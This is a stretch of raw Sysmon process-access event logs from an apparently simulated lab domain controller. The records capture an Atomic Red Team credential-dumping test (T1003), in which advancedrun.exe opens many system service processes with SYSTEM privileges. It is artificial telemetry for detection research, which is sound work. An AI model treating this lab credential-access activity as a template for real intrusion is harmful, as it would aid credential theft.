17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
